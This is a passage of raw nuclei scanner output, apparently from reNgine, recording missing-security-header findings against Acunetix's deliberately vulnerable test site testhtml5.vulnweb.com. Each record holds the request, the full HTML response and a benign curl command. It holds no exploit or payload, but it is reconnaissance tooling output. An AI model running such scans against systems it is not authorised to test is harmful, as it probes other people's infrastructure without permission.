\\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506601402Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506626444Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:49.506654215Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.61\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv 